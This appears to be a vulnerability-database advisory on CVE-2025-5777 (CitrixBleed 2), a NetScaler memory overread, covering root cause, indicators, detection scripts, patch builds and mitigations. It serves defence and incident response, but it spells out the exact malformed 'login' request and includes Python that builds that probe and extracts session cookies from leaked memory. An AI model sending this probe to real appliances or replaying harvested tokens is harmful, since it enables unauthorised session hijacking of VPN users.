CVE Vulnerability Database

CVE-2025-5777: Citrix NetScaler ADC and Gateway Memory Overread Flaw (CitrixBleed 2)

CVE-2025-5777 is an out-of-bounds memory read (memory overread) vulnerability in Citrix NetScaler Application Delivery Controller and NetScaler Gateway caused by insufficient input validation. This article covers technical details, affected configurations, detection, and mitigation.


CVE-2025-5777 Overview

CVE-2025-5777, known as CitrixBleed 2, is a memory overread vulnerability in Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway. The flaw stems from insufficient input validation when the appliance is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server. Unauthenticated remote attackers can send crafted requests that cause the device to leak uninitialized stack memory in HTTP responses. Leaked memory frequently contains session tokens, enabling adversaries to hijack authenticated sessions and bypass multi-factor authentication. CISA added the vulnerability to the Known Exploited Vulnerabilities catalog after confirmed in-the-wild exploitation.

Critical Impact

Unauthenticated attackers can exfiltrate session tokens and credentials directly from NetScaler memory, leading to full session hijack of remote-access users.

Affected Products

  • Citrix NetScaler Application Delivery Controller (including FIPS and NDcPP builds)
  • Citrix NetScaler Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy)
  • NetScaler ADC configured as AAA virtual server

Discovery Timeline

  • 2025-06-17 - CVE-2025-5777 published to NVD with Citrix advisory CTX693420
  • 2025-07-10 - CISA added CVE-2025-5777 to the Known Exploited Vulnerabilities catalog
  • 2025-10-30 - Last updated in NVD database

Technical Details for CVE-2025-5777

Vulnerability Analysis

The vulnerability is an out-of-bounds read [CWE-125] combined with use of an uninitialized resource [CWE-908] and use of an uninitialized variable [CWE-457]. NetScaler parses HTTP POST parameters submitted to authentication endpoints such as /p/u/doAuthentication.do. When the request body contains the bare parameter name login with no = separator and no value, the appliance does not validate the missing input and reflects the contents of an uninitialized stack buffer in the XML response inside an <InitialValue> element. Each request returns a different fragment of stack memory, so an attacker can poll the endpoint repeatedly and harvest sensitive data, including valid NSC_AAAC session cookies belonging to authenticated VPN users.

Root Cause

The authentication request handler copies the submitted login value into a stack buffer that is not zeroed beforehand. When login arrives without an = separator, the copy writes nothing, yet the response serializer still emits the buffer's contents. The public write-ups report that the leak depends on the separator being absent: login= with an empty value does not trigger it. The bug parallels the original CitrixBleed (CVE-2023-4966) but lives in a different code path, the AAA and Gateway login workflow.

Attack Vector

Exploitation requires only network reach to a Gateway or AAA virtual server; no authentication is needed, and the management (NSIP) interface is not involved. An attacker sends a POST /p/u/doAuthentication.do request whose body is the parameter name login with no value. The server returns an XML body whose <InitialValue> element contains roughly 127 bytes of leaked memory. Repeated requests return different chunks, and attackers replay extracted session tokens against the Gateway portal to assume hijacked sessions without triggering MFA challenges. Public technical write-ups from Horizon3, watchTowr, and DoublePulsar document the request structure and response parsing used in active exploitation campaigns. See the Horizon3 Blog on CVE-2025-5777 and watchTowr Analysis on CitrixBleed 2 for the full request-response analysis.

Detection Methods for CVE-2025-5777

Indicators of Compromise

  • HTTP POST requests to /p/u/doAuthentication.do whose body is the bare parameter name login with no = separator or value
  • Responses containing <InitialValue> elements with non-ASCII or high-entropy binary content
  • Repeated authentication requests from a single source IP within short time windows without successful logins
  • Reuse of existing NSC_AAAC session cookies from new geolocations or user-agents inconsistent with the legitimate user
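The request shape from the attack vector section and the first two indicators above, as an added example that is not part of this article or of any Citrix or vendor tooling. It builds the malformed POST as raw bytes and classifies a captured response offline: because the probe carries no login value, a correct appliance must answer with an empty <InitialValue>, so any content inside it is memory the request never supplied. The host name, the cookie character class, and both sample responses are constructed assumptions.

```python
import math
import re
import string
from typing import Dict, List

# Added example (not from the advisory or from Citrix). Builds the malformed
# POST described in the write-ups and classifies a captured response offline.
# The host name, cookie pattern and both sample responses below are constructed.

ENDPOINT = "/p/u/doAuthentication.do"
PRINTABLE = set(string.printable.encode())
_INITIAL_VALUE = re.compile(rb"<InitialValue>(.*?)</InitialValue>", re.S)
# Assumed cookie shape: an opaque run of URL-safe characters after NSC_AAAC=.
_COOKIE = re.compile(rb"NSC_AAAC=([A-Za-z0-9_#+/=-]{16,})")


def build_probe_request(host: str) -> bytes:
    """Raw HTTP/1.1 request whose body is the bare name 'login' with no '='
    and no value, the shape that triggers the overread on unpatched builds."""
    body = b"login"
    head = (
        f"POST {ENDPOINT} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n\r\n"
    )
    return head.encode("ascii") + body


def extract_initial_values(response: bytes) -> List[bytes]:
    """All <InitialValue> payloads found in one response body."""
    return _INITIAL_VALUE.findall(response)


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    counts: Dict[int, int] = {}
    for b in data:
        counts[b] = counts.get(b, 0) + 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def classify_response(response: bytes) -> dict:
    """Anything inside <InitialValue> is leaked memory: count non-printable
    bytes, measure entropy and pull out session cookies so an analyst can
    judge what a captured exchange actually exposed."""
    leaked = b"".join(extract_initial_values(response))
    non_printable = sum(1 for b in leaked if b not in PRINTABLE)
    return {
        "leaking": len(leaked) > 0,
        "leaked_bytes": len(leaked),
        "non_printable": non_printable,
        "entropy": round(shannon_entropy(leaked), 2),
        "cookies": [c.decode("ascii") for c in _COOKIE.findall(leaked)],
    }


# Constructed sample responses: a patched appliance echoes nothing; an
# unpatched one returns stack bytes that happen to contain another user's cookie.
PATCHED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: application/xml\r\n\r\n"
    b'<?xml version="1.0"?><AuthenticateResponse><Requirement><Credential>'
    b"<ID>login</ID><InitialValue></InitialValue></Credential></Requirement>"
    b"</AuthenticateResponse>"
)
LEAKY_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: application/xml\r\n\r\n"
    b'<?xml version="1.0"?><AuthenticateResponse><Requirement><Credential>'
    b"<ID>login</ID><InitialValue>\x00\x08\x7f\xfe\x90\x10"
    b"NSC_AAAC=c0ffee0123456789abcdef0123456789abcdef01; Path=/; Secure"
    b"\xe9\x00\x00\x00</InitialValue></Credential></Requirement>"
    b"</AuthenticateResponse>"
)

if __name__ == "__main__":
    print(build_probe_request("gateway.example.test").decode("ascii"))
    for name, resp in (("patched", PATCHED_RESPONSE), ("leaky", LEAKY_RESPONSE)):
        print(name, classify_response(resp))
```

The same classification applies to responses pulled from a packet capture or WAF log during incident scoping: a non-empty <InitialValue> after this request is the signature, and any cookie recovered from it names a session that must be killed and a user whose credentials need rotating.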

Detection Strategies

  • Note that NetScaler's ns.log does not record HTTP request bodies, so the malformed login parameter is only visible where full requests are captured: a WAF or reverse proxy in front of the appliance, an IDS with HTTP reassembly, or packet capture. Search those sources for doAuthentication.do POST requests whose body is the bare login name
  • Correlate active VPN sessions with originating client IP changes mid-session, which indicates token replay
  • Deploy network IDS signatures that flag responses from NetScaler endpoints containing <InitialValue> tags with binary payloads
  • Hunt for VPN sessions that are active or generating HTTP requests but have no matching AAA authentication event in the retained logs; a replayed token may belong to a login that predates the log window or to a session whose audit entries have rolled over

Monitoring Recommendations

  • Enable verbose AAA logging on NetScaler and forward to a centralized SIEM for retention and correlation
  • Run show aaa session and show icaconnection on a schedule and alert on sessions lacking corresponding authentication audit entries
  • Monitor CISA Known Exploited Vulnerabilities Catalog updates and threat intelligence feeds tracking CitrixBleed 2 activity
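The two correlation checks from the detection strategies and monitoring lists above (client IP changing mid-session, and request activity on a session with no login event in the same log window), as an added example that is not part of this article or of NetScaler's own tooling. The sample lines are constructed to approximate the SSLVPN LOGIN and HTTPREQUEST records NetScaler writes to ns.log; field order on a real appliance should be confirmed against its own output before the regex is trusted, and the IP addresses and session IDs are invented.

```python
import re
from typing import Dict, List, Set

# Added example (not from the advisory or from Citrix). Constructed sample lines
# approximating the SSLVPN LOGIN / HTTPREQUEST layout in ns.log; verify the
# field order against a real appliance before relying on the regex.
SAMPLE_NS_LOG = """\
Jul 10 09:58:12 <local0.info> 10.0.0.5 07/10/2025:09:58:12 GMT ns 0-PPE-0 : default SSLVPN LOGIN 10221 0 : Context alice@198.51.100.20 - SessionId: 4711- User alice - Client_ip 198.51.100.20 - Nat_ip "Mapped Ip" - Vserver 203.0.113.10:443 - Browser_type "Mozilla/5.0 (Windows NT 10.0)" - SSLVPN_client_type ICA - Group(s) "N/A"
Jul 10 09:59:01 <local0.info> 10.0.0.5 07/10/2025:09:59:01 GMT ns 0-PPE-0 : default SSLVPN HTTPREQUEST 10222 0 : Context alice@198.51.100.20 - SessionId: 4711- vpn.example.com User alice : Group(s) N/A : Vserver 203.0.113.10:443 - 07/10/2025:09:59:01 GMT GET /cgi/GetAuthMethods - -
Jul 10 10:14:40 <local0.info> 10.0.0.5 07/10/2025:10:14:40 GMT ns 0-PPE-0 : default SSLVPN HTTPREQUEST 10240 0 : Context alice@192.0.2.77 - SessionId: 4711- vpn.example.com User alice : Group(s) N/A : Vserver 203.0.113.10:443 - 07/10/2025:10:14:40 GMT GET /cgi/setclient?wica - -
Jul 10 10:20:03 <local0.info> 10.0.0.5 07/10/2025:10:20:03 GMT ns 0-PPE-0 : default SSLVPN HTTPREQUEST 10251 0 : Context bob@192.0.2.77 - SessionId: 4800- vpn.example.com User bob : Group(s) N/A : Vserver 203.0.113.10:443 - 07/10/2025:10:20:03 GMT GET /cgi/GetAuthMethods - -
"""

_EVENT = re.compile(
    r"(?P<ts>\d{2}/\d{2}/\d{4}:\d{2}:\d{2}:\d{2}) GMT .*?SSLVPN "
    r"(?P<kind>LOGIN|HTTPREQUEST|LOGOUT) \d+ \d+ : "
    r"Context (?P<user>[^@\s]+)@(?P<ip>[0-9.]+) - SessionId: (?P<sid>\d+)-"
)


def parse_events(text: str) -> List[Dict[str, str]]:
    """One dict per recognised SSLVPN event, in log order."""
    return [m.groupdict() for m in map(_EVENT.search, text.splitlines()) if m]


def find_hijack_indicators(text: str) -> List[Dict[str, str]]:
    """CLIENT_IP_CHANGE: a session's requests arrive from an IP other than the
    ones seen so far for that SessionId. NO_LOGIN_EVENT: HTTP activity on a
    SessionId with no LOGIN record in this log window (token reuse, or a login
    that predates retention; either way it needs a look)."""
    ips_seen: Dict[str, List[str]] = {}
    logged_in: Set[str] = set()
    flagged: Set[str] = set()
    alerts: List[Dict[str, str]] = []
    for ev in parse_events(text):
        sid, ip = ev["sid"], ev["ip"]
        seen = ips_seen.setdefault(sid, [])
        if ev["kind"] == "LOGIN":
            logged_in.add(sid)
        elif ev["kind"] == "HTTPREQUEST":
            if sid not in logged_in and sid not in flagged:
                flagged.add(sid)
                alerts.append({"indicator": "NO_LOGIN_EVENT", "session": sid,
                               "user": ev["user"], "ip": ip, "prev_ip": "",
                               "ts": ev["ts"]})
            if seen and ip not in seen:
                alerts.append({"indicator": "CLIENT_IP_CHANGE", "session": sid,
                               "user": ev["user"], "ip": ip, "prev_ip": seen[-1],
                               "ts": ev["ts"]})
        if ip not in seen:
            seen.append(ip)
    return alerts


def suspect_sources(alerts: List[Dict[str, str]]) -> List[str]:
    """Client IPs to pivot on (block at the edge, search other logs)."""
    return sorted({a["ip"] for a in alerts})


if __name__ == "__main__":
    found = find_hijack_indicators(SAMPLE_NS_LOG)
    for a in found:
        print(a)
    print("pivot on:", suspect_sources(found))
```

On the sample, alice's session 4711 is flagged when its requests start arriving from 192.0.2.77, and bob's session 4800 is flagged because the same source is using it with no login in the window; the one shared IP is the obvious pivot for the rest of the investigation. Run the same logic over the SIEM-forwarded AAA logs rather than on the appliance, since ns.log rotates quickly and the login that a replayed token belongs to may already have rolled off.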

How to Mitigate CVE-2025-5777

Immediate Actions Required

  • Upgrade NetScaler ADC and Gateway to the fixed builds listed in Citrix Support Article CTX693420
  • After patching, terminate all active ICA and PCoIP sessions using kill icaconnection -all and kill pcoipConnection -all to invalidate any stolen tokens
  • Rotate credentials for accounts that authenticated through the Gateway during the exposure window
  • Audit AAA session records for unauthorized access prior to remediation

Patch Information

Citrix released fixed builds for NetScaler ADC and Gateway 14.1 (14.1-43.56 and later), 13.1 (13.1-58.32 and later), 13.1-FIPS and 13.1-NDcPP (13.1-37.235 and later), and 12.1-FIPS (12.1-55.328 and later). Versions 12.1 and 13.0 are end-of-life and remain vulnerable; appliances on those releases must move to a supported branch. Confirm the exact build numbers against CTX693420 before remediating CVE-2025-5777. CISA gave federal agencies one day from the KEV listing to patch.

Workarounds

  • No supported configuration workaround eliminates the flaw; patching is the only complete remediation
  • If immediate patching is not possible, disable Gateway and AAA virtual servers until fixed builds are deployed
  • Restrict management and Gateway interface exposure to trusted networks and VPN concentrators
  • Force-expire all existing user sessions and require reauthentication after applying the patch
```shell
# Post-patch session invalidation, entered at the NetScaler CLI (not a bash shell)
kill icaconnection -all
kill pcoipConnection -all
kill aaa session -all
```

Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
